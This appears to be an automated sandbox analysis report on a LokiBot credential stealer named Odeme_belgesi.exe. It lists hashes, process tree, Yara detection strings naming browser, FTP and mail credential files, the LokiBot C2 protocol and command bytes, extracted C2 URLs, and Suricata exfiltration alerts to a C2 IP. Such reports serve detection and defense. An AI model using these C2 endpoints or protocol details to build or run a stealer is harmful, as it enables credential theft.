Edit tour

Windows Analysis Report
Odeme_belgesi.exe

Overview

General Information

Sample name:	Odeme_belgesi.exe
Analysis ID:	1523245
MD5:	fc9c0d308e1e66caf355a329f171362a
SHA1:	f88d0427a7fab032dcc647f68facf43fcda1857e
SHA256:	079f962ef81e19092c633fe2e44d5ebb31eb83c0cb5d1052e1a048e15ba549c8
Tags:	exeuser-lowmal3
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Lokibot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Odeme_belgesi.exe (PID: 6912 cmdline: "C:\Users\user\Desktop\Odeme_belgesi.exe" MD5: FC9C0D308E1E66CAF355A329F171362A)

Odeme_belgesi.exe (PID: 7124 cmdline: C:\Users\user\Desktop\Odeme_belgesi.exe MD5: FC9C0D308E1E66CAF355A329F171362A)

Odeme_belgesi.exe (PID: 7128 cmdline: C:\Users\user\Desktop\Odeme_belgesi.exe MD5: FC9C0D308E1E66CAF355A329F171362A)

WerFault.exe (PID: 4996 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://solutviewmen.viewdns.net/bdifygidj/five/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1b2e4:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x8627:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x16e6b:$des3: 68 03 66 00 00 0x1b2e4:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1b3b0:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x18d6c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x60af:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x148f3:$des3: 68 03 66 00 00 0x18d6c:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x18e38:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17ca8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x5073:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x138b7:$des3: 68 03 66 00 00 0x17ca8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17d74:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000002.2914383353.0000000001268000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: Odeme_belgesi.exe PID: 6912	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Odeme_belgesi.exe PID: 6912	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Odeme_belgesi.exe PID: 6912	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x32eb1:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0xdf5f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x113a4d:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: Odeme_belgesi.exe PID: 7124	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Odeme_belgesi.exe PID: 7124	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Odeme_belgesi.exe PID: 7124	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: Odeme_belgesi.exe PID: 7124	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x80f3:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Odeme_belgesi.exe.44788b8.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Odeme_belgesi.exe.44788b8.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Odeme_belgesi.exe.44788b8.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Odeme_belgesi.exe.44788b8.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Odeme_belgesi.exe.44788b8.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.Odeme_belgesi.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.Odeme_belgesi.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.Odeme_belgesi.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Odeme_belgesi.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.Odeme_belgesi.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.Odeme_belgesi.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
1.2.Odeme_belgesi.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.Odeme_belgesi.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
1.2.Odeme_belgesi.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.Odeme_belgesi.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.Odeme_belgesi.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Odeme_belgesi.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.Odeme_belgesi.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.Odeme_belgesi.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.2.Odeme_belgesi.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.Odeme_belgesi.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 24 entries

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T10:54:59.840322+0200	2024312	1	A Network Trojan was detected	192.168.2.4	49730	45.66.231.242	80	TCP
2024-10-01T10:55:00.929821+0200	2024312	1	A Network Trojan was detected	192.168.2.4	49731	45.66.231.242	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T10:54:59.017244+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49730	45.66.231.242	80	TCP
2024-10-01T10:55:00.012405+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49731	45.66.231.242	80	TCP
2024-10-01T10:55:01.012878+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49732	45.66.231.242	80	TCP
2024-10-01T10:55:01.929584+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49733	45.66.231.242	80	TCP
2024-10-01T10:55:02.838931+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49734	45.66.231.242	80	TCP
2024-10-01T10:55:03.734897+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49735	45.66.231.242	80	TCP
2024-10-01T10:55:04.791909+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49736	45.66.231.242	80	TCP
2024-10-01T10:55:05.714856+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49737	45.66.231.242	80	TCP
2024-10-01T10:55:06.689995+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49738	45.66.231.242	80	TCP
2024-10-01T10:55:10.539446+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49739	45.66.231.242	80	TCP
2024-10-01T10:55:11.431407+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49740	45.66.231.242	80	TCP
2024-10-01T10:55:12.290926+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49741	45.66.231.242	80	TCP
2024-10-01T10:55:13.156783+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49742	45.66.231.242	80	TCP
2024-10-01T10:55:14.059014+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49744	45.66.231.242	80	TCP
2024-10-01T10:55:15.181877+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49747	45.66.231.242	80	TCP
2024-10-01T10:55:16.001641+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49749	45.66.231.242	80	TCP
2024-10-01T10:55:17.057243+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49752	45.66.231.242	80	TCP
2024-10-01T10:55:20.935914+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49753	45.66.231.242	80	TCP
2024-10-01T10:55:21.808725+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49754	45.66.231.242	80	TCP
2024-10-01T10:55:22.700322+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49755	45.66.231.242	80	TCP
2024-10-01T10:55:23.622010+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49756	45.66.231.242	80	TCP
2024-10-01T10:55:24.716379+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49757	45.66.231.242	80	TCP
2024-10-01T10:55:25.534367+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49758	45.66.231.242	80	TCP
2024-10-01T10:55:26.361457+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49759	45.66.231.242	80	TCP
2024-10-01T10:55:27.260785+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49760	45.66.231.242	80	TCP
2024-10-01T10:55:28.111446+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49761	45.66.231.242	80	TCP
2024-10-01T10:55:28.997001+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49762	45.66.231.242	80	TCP
2024-10-01T10:55:29.807741+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49763	45.66.231.242	80	TCP
2024-10-01T10:55:30.730772+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49764	45.66.231.242	80	TCP
2024-10-01T10:55:31.541452+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49765	45.66.231.242	80	TCP
2024-10-01T10:55:32.344919+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49766	45.66.231.242	80	TCP
2024-10-01T10:55:33.286078+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49767	45.66.231.242	80	TCP
2024-10-01T10:55:34.118881+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49768	45.66.231.242	80	TCP
2024-10-01T10:55:34.933166+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49769	45.66.231.242	80	TCP
2024-10-01T10:55:35.839128+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49770	45.66.231.242	80	TCP
2024-10-01T10:55:36.706651+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49771	45.66.231.242	80	TCP
2024-10-01T10:55:37.524416+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49772	45.66.231.242	80	TCP
2024-10-01T10:55:38.374178+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49773	45.66.231.242	80	TCP
2024-10-01T10:55:39.385441+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49774	45.66.231.242	80	TCP
2024-10-01T10:55:40.328121+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49775	45.66.231.242	80	TCP
2024-10-01T10:55:41.381303+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49776	45.66.231.242	80	TCP
2024-10-01T10:55:42.421721+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49777	45.66.231.242	80	TCP
2024-10-01T10:55:43.589678+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49778	45.66.231.242	80	TCP
2024-10-01T10:55:47.464644+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49779	45.66.231.242	80	TCP
2024-10-01T10:55:48.292929+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49780	45.66.231.242	80	TCP
2024-10-01T10:55:49.348506+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49781	45.66.231.242	80	TCP
2024-10-01T10:55:50.343657+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49782	45.66.231.242	80	TCP
2024-10-01T10:55:51.144817+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49783	45.66.231.242	80	TCP
2024-10-01T10:55:52.156456+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49784	45.66.231.242	80	TCP
2024-10-01T10:55:53.192942+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49786	45.66.231.242	80	TCP
2024-10-01T10:55:53.988611+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49787	45.66.231.242	80	TCP
2024-10-01T10:55:54.958720+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49788	45.66.231.242	80	TCP
2024-10-01T10:55:55.793611+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49789	45.66.231.242	80	TCP
2024-10-01T10:55:56.591640+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49790	45.66.231.242	80	TCP
2024-10-01T10:55:57.452108+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49791	45.66.231.242	80	TCP
2024-10-01T10:55:58.764642+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49792	45.66.231.242	80	TCP
2024-10-01T10:55:59.680645+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49793	45.66.231.242	80	TCP
2024-10-01T10:56:00.513321+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49794	45.66.231.242	80	TCP
2024-10-01T10:56:10.439429+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49795	45.66.231.242	80	TCP
2024-10-01T10:56:11.353855+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49796	45.66.231.242	80	TCP
